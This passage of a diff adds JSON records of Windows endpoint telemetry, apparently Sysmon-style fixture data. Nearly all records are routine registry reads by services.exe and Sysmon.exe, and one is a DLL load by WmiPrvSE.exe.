"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + 
"process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848860000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
